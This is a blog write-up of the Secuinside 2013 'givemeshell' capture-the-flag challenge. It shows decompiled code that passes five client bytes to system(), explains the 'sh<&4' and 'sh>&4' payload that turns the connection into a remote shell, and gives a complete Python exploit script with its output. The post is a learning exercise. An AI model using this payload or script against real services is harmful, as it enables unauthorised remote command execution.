2014년 6월 14일 토요일

Secuinside 2013 givemeshell

An easy challenge.


/*
 * Decompiled handler for one client connection (IDA pseudo-code).
 *
 * Reads at most 5 bytes from the client socket `fd` into `cmd` and hands
 * that buffer straight to system(): the command string is entirely
 * attacker-controlled, so this is command injection by design (the
 * challenge). Note what is NOT exploitable here: `cmd` sits 6 bytes below
 * the canary ([bp-12h] vs [bp-0Ch]), memset() zeroes all 6 and recv()
 * writes at most 5, so the string is always NUL-terminated and nothing is
 * overflowed -- the stack-protector epilogue is never triggered by input.
 *
 * `fd`: connected client socket. Returns the canary XOR (decompiler
 * artifact of the __stack_chk_fail prologue/epilogue), nothing meaningful.
 */
int __cdecl important_part(int fd)
{
int v1; // edx@1 -- uninitialized decompiler artifacts, not real arguments
int v2; // ecx@1
int result; // eax@3
char cmd; // [sp+16h] [bp-12h]@1 -- 6-byte buffer (up to the canary)
int canary; // [sp+1Ch] [bp-Ch]@1

canary = *MK_FP(__GS__, 20); // stack protector: load the TLS canary
memset(&cmd, 0, 6u); // zero all 6 bytes so the 5-byte read is NUL-terminated
if ( recv(fd, &cmd, 5u, 0) > 0 ) // only 5 bytes accepted; 0 (peer closed) or -1 skips the call
system(&cmd); // runs "/bin/sh -c <5 attacker bytes>"; the child inherits this
// process's open descriptors, which is what the `sh<&4` payload relies on
// (that the client socket is fd 4 in the server is target-specific -- verify)
result = *MK_FP(__GS__, 20) ^ canary;
if ( *MK_FP(__GS__, 20) != canary )
__stack_chk_fail(v2, v1); // canary mismatch -> abort (unreachable with a 5-byte recv)
return result;
}

This is the important part: it accepts only 5 bytes from the user and passes them straight to system(). The buffer itself is safe (6 bytes zeroed, at most 5 written), so the bug is the command execution, not a stack overflow.

Idea: `sh<&4` then `sh>&4`. Five bytes is too short for a useful command, but `sh<&4` fits exactly: it starts a shell whose stdin is the client socket (the socket is assumed to be fd 4 in the server process, and system() lets the child inherit it). Everything sent afterwards is read by that shell, so the next line `sh>&4` starts a second shell with stdout redirected to the socket -- from then on commands go in and their output comes back over the same connection.

exploit code

#!/usr/bin/python
from socket import *

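def shell():
    """Send one interactive command line to the remote shell and print its reply.

    Reads a line from the local user, forwards it over the module-level
    socket ``s`` (the remote ``sh`` reads its stdin from that socket), then
    prints whatever the remote side sends back.

    Raises:
        EOFError: if the remote side closed the connection (recv returned
            no data) or the local user hit EOF on stdin (raw_input).
    """
    cmd = raw_input("$ ")
    # sendall(): a plain send() may transmit only part of the buffer.
    s.sendall(cmd + "\n")
    data = s.recv(1024)
    if not data:
        # An empty read means the peer closed the socket; the original loop
        # would spin forever printing blank lines here.
        raise EOFError("remote shell closed the connection")
    # NOTE: a single recv() only returns what has arrived so far; long
    # command output may be split across several calls.
    print(data)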

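HOST, PORT = '10.211.55.4', 8989   # target running the givemeshell service

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
try:
    # Stage 1: exactly 5 bytes, the most the service's recv(fd, &cmd, 5)
    # accepts. system("sh<&4") starts a shell whose stdin is the client
    # socket (assumed to be fd 4 in the target process; inherited across
    # system()). No newline: the service runs the 5 bytes as-is.
    s.sendall("sh<&4")
    # Stage 2: this line is read by that shell, not by the service. It
    # starts a second shell with stdout redirected to the socket, so command
    # output is sent back to us.
    s.sendall("sh>&4\n")
    while True:
        shell()
except (EOFError, KeyboardInterrupt):
    pass  # local Ctrl-D / Ctrl-C or remote close ends the session
finally:
    s.close()  # originally placed after the infinite loop and never reached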

result

mangoui-MacBook-Pro:~ kjungi704$ ./givemeshell.py 
$ cat key
this is key

clear!